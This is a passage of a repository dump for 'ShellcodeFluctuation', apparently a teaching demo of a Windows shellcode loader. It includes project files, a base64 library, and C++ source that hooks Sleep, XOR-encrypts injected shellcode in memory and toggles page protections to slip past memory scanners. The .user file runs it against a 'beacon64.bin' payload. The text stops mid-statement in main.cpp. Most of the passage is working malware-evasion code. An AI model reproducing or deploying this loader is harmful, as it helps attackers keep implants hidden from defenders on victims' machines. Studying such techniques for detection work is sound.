    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <ProjectGuid>{9eed9e19-9475-4d2e-9b06-37d6799417fe}</ProjectGuid>\r\n    <RootNamespace>ShellcodeFluctuation</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    
<CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" 
Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n      <LanguageStandard>stdcpp17</LanguageStandard>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n      
<LanguageStandard>stdcpp17</LanguageStandard>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>false</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n      <LanguageStandard>stdcpp17</LanguageStandard>\r\n      <BufferSecurityCheck>false</BufferSecurityCheck>\r\n      <ControlFlowGuard>false</ControlFlowGuard>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n      <LanguageStandard>stdcpp17</LanguageStandard>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"base64.cpp\" />\r\n    <ClCompile Include=\"main.cpp\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude 
Include=\"base64.h\" />\r\n    <ClInclude Include=\"header.h\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation/ShellcodeFluctuation.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"Source Files\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Header Files\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n    <ClCompile Include=\"base64.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"header.h\">\r\n      <Filter>Header Files</Filter>\r\n    </ClInclude>\r\n    <ClInclude Include=\"base64.h\">\r\n      <Filter>Header Files</Filter>\r\n    </ClInclude>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation/ShellcodeFluctuation.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LocalDebuggerCommandArguments>d:\\dev2\\ShellcodeFluctuation\\tests\\beacon64.bin 2</LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n</Project>"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation/base64.cpp",
    "content": "/*\n   base64.cpp and base64.h\n\n   base64 encoding and decoding with C++.\n   More information at\n\t https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp\n\n   Version: 2.rc.08 (release candidate)\n\n   Copyright (C) 2004-2017, 2020, 2021 René Nyffenegger\n\n   This source code is provided 'as-is', without any express or implied\n   warranty. In no event will the author be held liable for any damages\n   arising from the use of this software.\n\n   Permission is granted to anyone to use this software for any purpose,\n   including commercial applications, and to alter it and redistribute it\n   freely, subject to the following restrictions:\n\n   1. The origin of this source code must not be misrepresented; you must not\n\t  claim that you wrote the original source code. If you use this source code\n\t  in a product, an acknowledgment in the product documentation would be\n\t  appreciated but is not required.\n\n   2. Altered source versions must be plainly marked as such, and must not be\n\t  misrepresented as being the original source code.\n\n   3. 
This notice may not be removed or altered from any source distribution.\n\n   René Nyffenegger rene.nyffenegger@adp-gmbh.ch\n\n*/\n\n#include \"base64.h\"\n\n#include <algorithm>\n#include <stdexcept>\n\n//\n// Depending on the url parameter in base64_chars, one of\n// two sets of base64 characters needs to be chosen.\n// They differ in their last two characters.\n//\nstatic const char* base64_chars[2] = {\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"+/\",\n\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"-_\" };\n\nstatic unsigned int pos_of_char(const unsigned char chr) {\n\t//\n\t// Return the position of chr within base64_encode()\n\t//\n\n\tif (chr >= 'A' && chr <= 'Z') return chr - 'A';\n\telse if (chr >= 'a' && chr <= 'z') return chr - 'a' + ('Z' - 'A') + 1;\n\telse if (chr >= '0' && chr <= '9') return chr - '0' + ('Z' - 'A') + ('z' - 'a') + 2;\n\telse if (chr == '+' || chr == '-') return 62; // Be liberal with input and accept both url ('-') and non-url ('+') base 64 characters (\n\telse if (chr == '/' || chr == '_') return 63; // Ditto for '/' and '_'\n\telse\n\t\t//\n\t\t// 2020-10-23: Throw std::exception rather than const char*\n\t\t//(Pablo Martin-Gomez, https://github.com/Bouska)\n\t\t//\n\t\tthrow std::runtime_error(\"Input is not valid base64-encoded data.\");\n}\n\nstatic std::string insert_linebreaks(std::string str, size_t distance) {\n\t//\n\t// Provided by https://github.com/JomaCorpFX, adapted by me.\n\t//\n\tif (!str.length()) {\n\t\treturn \"\";\n\t}\n\n\tsize_t pos = distance;\n\n\twhile (pos < str.size()) {\n\t\tstr.insert(pos, \"\\n\");\n\t\tpos += distance + 1;\n\t}\n\n\treturn str;\n}\n\ntemplate <typename String, unsigned int line_length>\nstatic std::string encode_with_line_breaks(String s) {\n\treturn insert_linebreaks(base64_encode(s, false), line_length);\n}\n\ntemplate <typename String>\nstatic 
std::string encode_pem(String s) {\n\treturn encode_with_line_breaks<String, 64>(s);\n}\n\ntemplate <typename String>\nstatic std::string encode_mime(String s) {\n\treturn encode_with_line_breaks<String, 76>(s);\n}\n\ntemplate <typename String>\nstatic std::string encode(String s, bool url) {\n\treturn base64_encode(reinterpret_cast<const unsigned char*>(s.data()), s.length(), url);\n}\n\nstd::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {\n\n\tsize_t len_encoded = (in_len + 2) / 3 * 4;\n\n\tunsigned char trailing_char = url ? '.' : '=';\n\n\t//\n\t// Choose set of base64 characters. They differ\n\t// for the last two positions, depending on the url\n\t// parameter.\n\t// A bool (as is the parameter url) is guaranteed\n\t// to evaluate to either 0 or 1 in C++ therefore,\n\t// the correct character set is chosen by subscripting\n\t// base64_chars with url.\n\t//\n\tconst char* base64_chars_ = base64_chars[url];\n\n\tstd::string ret;\n\tret.reserve(len_encoded);\n\n\tunsigned int pos = 0;\n\n\twhile (pos < in_len) {\n\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0xfc) >> 2]);\n\n\t\tif (pos + 1 < in_len) {\n\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 0] & 0x03) << 4) + ((bytes_to_encode[pos + 1] & 0xf0) >> 4)]);\n\n\t\t\tif (pos + 2 < in_len) {\n\t\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 1] & 0x0f) << 2) + ((bytes_to_encode[pos + 2] & 0xc0) >> 6)]);\n\t\t\t\tret.push_back(base64_chars_[bytes_to_encode[pos + 2] & 0x3f]);\n\t\t\t}\n\t\t\telse {\n\t\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 1] & 0x0f) << 2]);\n\t\t\t\tret.push_back(trailing_char);\n\t\t\t}\n\t\t}\n\t\telse {\n\n\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0x03) << 4]);\n\t\t\tret.push_back(trailing_char);\n\t\t\tret.push_back(trailing_char);\n\t\t}\n\n\t\tpos += 3;\n\t}\n\n\n\treturn ret;\n}\n\ntemplate <typename String>\nstatic std::string decode(String encoded_string, bool 
remove_linebreaks) {\n\t//\n\t// decode(...) is templated so that it can be used with String = const std::string&\n\t// or std::string_view (requires at least C++17)\n\t//\n\n\tif (encoded_string.empty()) return std::string();\n\n\tif (remove_linebreaks) {\n\n\t\tstd::string copy(encoded_string);\n\n\t\tcopy.erase(std::remove(copy.begin(), copy.end(), '\\n'), copy.end());\n\n\t\treturn base64_decode(copy, false);\n\t}\n\n\tsize_t length_of_string = encoded_string.length();\n\tsize_t pos = 0;\n\n\t//\n\t// The approximate length (bytes) of the decoded string might be one or\n\t// two bytes smaller, depending on the amount of trailing equal signs\n\t// in the encoded string. This approximation is needed to reserve\n\t// enough space in the string to be returned.\n\t//\n\tsize_t approx_length_of_decoded_string = length_of_string / 4 * 3;\n\tstd::string ret;\n\tret.reserve(approx_length_of_decoded_string);\n\n\twhile (pos < length_of_string) {\n\t\t//\n\t\t// Iterate over encoded input string in chunks. The size of all\n\t\t// chunks except the last one is 4 bytes.\n\t\t//\n\t\t// The last chunk might be padded with equal signs or dots\n\t\t// in order to make it 4 bytes in size as well, but this\n\t\t// is not required as per RFC 2045.\n\t\t//\n\t\t// All chunks except the last one produce three output bytes.\n\t\t//\n\t\t// The last chunk produces at least one and up to three bytes.\n\t\t//\n\n\t\tsize_t pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);\n\n\t\t//\n\t\t// Emit the first output byte that is produced in each chunk:\n\t\t//\n\t\tret.push_back(static_cast<std::string::value_type>(((pos_of_char(encoded_string[pos + 0])) << 2) + ((pos_of_char_1 & 0x30) >> 4)));\n\n\t\tif ((pos + 2 < length_of_string) &&  // Check for data that is not padded with equal signs (which is allowed by RFC 2045)\n\t\t\tencoded_string[pos + 2] != '=' &&\n\t\t\tencoded_string[pos + 2] != '.'            // accept URL-safe base 64 strings, too, so check for '.' 
also.\n\t\t\t)\n\t\t{\n\t\t\t//\n\t\t\t// Emit a chunk's second byte (which might not be produced in the last chunk).\n\t\t\t//\n\t\t\tunsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);\n\t\t\tret.push_back(static_cast<std::string::value_type>(((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));\n\n\t\t\tif ((pos + 3 < length_of_string) &&\n\t\t\t\tencoded_string[pos + 3] != '=' &&\n\t\t\t\tencoded_string[pos + 3] != '.'\n\t\t\t\t)\n\t\t\t{\n\t\t\t\t//\n\t\t\t\t// Emit a chunk's third byte (which might not be produced in the last chunk).\n\t\t\t\t//\n\t\t\t\tret.push_back(static_cast<std::string::value_type>(((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));\n\t\t\t}\n\t\t}\n\n\t\tpos += 4;\n\t}\n\n\treturn ret;\n}\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\nstd::string base64_encode(std::string const& s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string const& s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string const& s) {\n\treturn encode_mime(s);\n}\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\n\nstd::string base64_encode(std::string_view s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string_view s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string_view s) {\n\treturn encode_mime(s);\n}\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\n#endif  // __cplusplus >= 201703L\n"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation/base64.h",
    "content": "#pragma once\r\n//\r\n//  base64 encoding and decoding with C++.\r\n//  Version: 2.rc.08 (release candidate)\r\n//\r\nconst int XOR_KEY{ 8 };\r\n#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\r\n#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\r\n\r\n#include <string>\r\n\r\n#if __cplusplus >= 201703L\r\n#include <string_view>\r\n#endif  // __cplusplus >= 201703L\r\n\r\nstd::string base64_encode(std::string const& s, bool url = false);\r\nstd::string base64_encode_pem(std::string const& s);\r\nstd::string base64_encode_mime(std::string const& s);\r\n\r\nstd::string base64_decode(std::string const& s, bool remove_linebreaks = false);\r\nstd::string base64_encode(unsigned char const*, size_t len, bool url = false);\r\n\r\n#if __cplusplus >= 201703L\r\n//\r\n// Interface with std::string_view rather than const std::string&\r\n// Requires C++17\r\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\r\n//\r\nstd::string base64_encode(std::string_view s, bool url = false);\r\nstd::string base64_encode_pem(std::string_view s);\r\nstd::string base64_encode_mime(std::string_view s);\r\n\r\nstd::string base64_decode(std::string_view s, bool remove_linebreaks = false);\r\n#endif  // __cplusplus >= 201703L\r\n\r\n#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */\r\n"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation/header.h",
    "content": "#pragma once\n\n#include <windows.h>\n#include <iostream>\n#include <sstream>\n#include <iomanip>\n#include <vector>\n#include <memory>       // std::unique_ptr (HandlePtr below)\n#include <type_traits>  // std::remove_pointer (HandlePtr below)\n#include <cstdint>      // uint8_t / uint32_t used in the declarations below\n\ntypedef void  (WINAPI* typeSleep)(\n    DWORD dwMilis\n    );\n\ntypedef DWORD(NTAPI* typeNtFlushInstructionCache)(\n    HANDLE ProcessHandle,\n    PVOID BaseAddress,\n    ULONG NumberOfBytesToFlush\n    );\n\ntypedef std::unique_ptr<std::remove_pointer<HANDLE>::type, decltype(&::CloseHandle)> HandlePtr;\n\nenum TypeOfFluctuation\n{\n    NoFluctuation = 0,\n    FluctuateToRW,\n    FluctuateToNA,      // ORCA666's delight: https://github.com/ORCA666/0x41\n};\n\nstruct FluctuationMetadata\n{\n    LPVOID shellcodeAddr;\n    SIZE_T shellcodeSize;\n    bool currentlyEncrypted;\n    DWORD encodeKey;\n    DWORD protect;\n};\n\nstruct HookedSleep\n{\n    typeSleep origSleep;\n    BYTE    sleepStub[16];\n};\n\nstruct HookTrampolineBuffers\n{\n    // (Input) Buffer containing bytes that should be restored while unhooking.\n    BYTE* originalBytes;\n    DWORD originalBytesSize;\n\n    // (Output) Buffer that will receive bytes present prior to trampoline installation/restoring.\n    BYTE* previousBytes;\n    DWORD previousBytesSize;\n};\n\n\ntemplate<class... Args>\nvoid log(Args... args)\n{\n    std::stringstream oss;\n    (oss << ... 
<< args);\n\n    std::cout << oss.str() << std::endl;\n}\n\nstatic const DWORD Shellcode_Memory_Protection = PAGE_EXECUTE_READ;\n\nbool hookSleep();\nbool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr& thread);\nbool readShellcode(const char* path, std::vector<uint8_t>& shellcode);\nstd::vector<MEMORY_BASIC_INFORMATION> collectMemoryMap(HANDLE hProcess, DWORD Type = MEM_PRIVATE | MEM_MAPPED);\nvoid initializeShellcodeFluctuation(const LPVOID caller);\nbool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers = NULL);\nvoid xor32(uint8_t* buf, size_t bufSize, uint32_t xorKey);\nbool isShellcodeThread(LPVOID address);\nvoid shellcodeEncryptDecrypt(LPVOID callerAddress);\nvoid relocateShellcode(const LPVOID caller, LPVOID addressOfRetAddr);\n\nvoid WINAPI MySleep(DWORD _dwMilliseconds);\n"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation/main.cpp",
    "content": "\n#include \"header.h\"\n#include <intrin.h>\n#include <random>\n#include \"base64.h\"\n\nHookedSleep g_hookedSleep;\nFluctuationMetadata g_fluctuationData;\nTypeOfFluctuation g_fluctuate;\n\n\nvoid WINAPI MySleep(DWORD dwMilliseconds)\n{\n    const LPVOID caller = (LPVOID)_ReturnAddress();\n\n    //\n    // Dynamically determine where the shellcode resides.\n    // Of course that we could reuse information collected in `injectShellcode()` \n    // right after VirtualAlloc, however the below invocation is a step towards\n    // making the implementation self-aware and independent of the loader.\n    //\n    initializeShellcodeFluctuation(caller);\n\n    //\n    // Encrypt (XOR32) shellcode's memory allocation and flip its memory pages to RW\n    //\n    shellcodeEncryptDecrypt(caller);\n\n\n    log(\"\\n===> MySleep(\", std::dec, dwMilliseconds, \")\\n\");\n\n    HookTrampolineBuffers buffers = { 0 };\n    buffers.originalBytes = g_hookedSleep.sleepStub;\n    buffers.originalBytesSize = sizeof(g_hookedSleep.sleepStub);\n\n    //\n    // Unhook kernel32!Sleep to evade hooked Sleep IOC. 
\n    // We leverage the fact that the return address left on the stack will make the thread\n    // get back to our handler anyway.\n    //\n    fastTrampoline(false, (BYTE*)::Sleep, (void*)&MySleep, &buffers);\n\n    // Perform sleep emulating originally hooked functionality.\n    ::Sleep(dwMilliseconds);\n\n    if (g_fluctuate == FluctuateToRW)\n    {\n        //\n        // Decrypt (XOR32) shellcode's memory allocation and flip its memory pages back to RX\n        //\n        shellcodeEncryptDecrypt((LPVOID)caller);\n    }\n    else\n    {\n        //\n        // If we fluctuate to PAGE_NOACCESS there is no need to decrypt and revert back memory protections just yet.\n        // We await for Access Violation exception to occur, catch it and from within the exception handler will adjust \n        // its protection to resume execution.\n        //\n    }\n\n    //\n    // Re-hook kernel32!Sleep\n    //\n    fastTrampoline(true, (BYTE*)::Sleep, (void*)&MySleep);\n}\n\nstd::vector<MEMORY_BASIC_INFORMATION> collectMemoryMap(HANDLE hProcess, DWORD Type)\n{\n    std::vector<MEMORY_BASIC_INFORMATION> out;\n    const size_t MaxSize = (sizeof(ULONG_PTR) == 4) ? 
((1ULL << 31) - 1) : ((1ULL << 63) - 1);\n\n    uint8_t* address = 0;\n    while (reinterpret_cast<size_t>(address) < MaxSize)\n    {\n        MEMORY_BASIC_INFORMATION mbi = { 0 };\n\n        if (!VirtualQueryEx(hProcess, address, &mbi, sizeof(mbi)))\n        {\n            break;\n        }\n\n        if ((mbi.Protect == PAGE_EXECUTE_READWRITE || mbi.Protect == PAGE_EXECUTE_READ || mbi.Protect == PAGE_READWRITE)\n            && ((mbi.Type & Type) != 0))\n        {\n            out.push_back(mbi);\n        }\n\n        address += mbi.RegionSize;\n    }\n\n    return out;\n}\n\nvoid initializeShellcodeFluctuation(const LPVOID caller)\n{\n    if ((g_fluctuate != NoFluctuation) && g_fluctuationData.shellcodeAddr == nullptr && isShellcodeThread(caller))\n    {\n        auto memoryMap = collectMemoryMap(GetCurrentProcess());\n\n        //\n        // Iterate over memory pages to find allocation containing the caller, being\n        // presumably our Shellcode's thread.\n        //\n        for (const auto& mbi : memoryMap)\n        {\n            if (reinterpret_cast<uintptr_t>(caller) > reinterpret_cast<uintptr_t>(mbi.BaseAddress)\n                && reinterpret_cast<uintptr_t>(caller) < (reinterpret_cast<uintptr_t>(mbi.BaseAddress) + mbi.RegionSize))\n            {\n                //\n                // Store memory boundary of our shellcode somewhere globally.\n                //\n                g_fluctuationData.shellcodeAddr = mbi.BaseAddress;\n                g_fluctuationData.shellcodeSize = mbi.RegionSize;\n                g_fluctuationData.currentlyEncrypted = false;\n\n                std::random_device dev;\n                std::mt19937 rng(dev());\n                std::uniform_int_distribution<std::mt19937::result_type> dist4GB(0, 0xffffffff);\n\n                //\n                // Use random 32bit key for XORing.\n                //\n                g_fluctuationData.encodeKey = dist4GB(rng);\n\n                log(\"[+] Fluctuation initialized.\");\n  
              log(\"    Shellcode resides at 0x\", \n                    std::hex, std::setw(8), std::setfill('0'), mbi.BaseAddress, \n                    \" and occupies \", std::dec, mbi.RegionSize, \n                    \" bytes. XOR32 key: 0x\", std::hex, std::setw(8), std::setfill('0'), g_fluctuationData.encodeKey, \"\\n\");\n\n                return;\n            }\n        }\n\n        log(\"[!] Could not initialize shellcode fluctuation!\");\n        ::ExitProcess(0);\n    }\n}\n\nvoid xor32(uint8_t* buf, size_t bufSize, uint32_t xorKey)\n{\n    uint32_t* buf32 = reinterpret_cast<uint32_t*>(buf);\n\n    auto bufSizeRounded = (bufSize - (bufSize % sizeof(uint32_t))) / 4;\n    for (size_t i = 0; i < bufSizeRounded; i++)\n    {\n        buf32[i] ^= xorKey;\n    }\n\n    for (size_t i = 4 * bufSizeRounded; i < bufSize; i++)\n    {\n        buf[i] ^= static_cast<uint8_t>(xorKey & 0xff);\n    }\n}\n\nbool isShellcodeThread(LPVOID address)\n{\n    MEMORY_BASIC_INFORMATION mbi = { 0 };\n    if (VirtualQuery(address, &mbi, sizeof(mbi)))\n    {\n        //\n        // To verify whether address belongs to the shellcode's allocation, we can simply\n        // query for its type. MEM_PRIVATE is an indicator of dynamic allocations such as VirtualAlloc.\n        //\n        if (mbi.Type == MEM_PRIVATE)\n        {\n            const DWORD expectedProtection = (g_fluctuate == FluctuateToRW) ? 
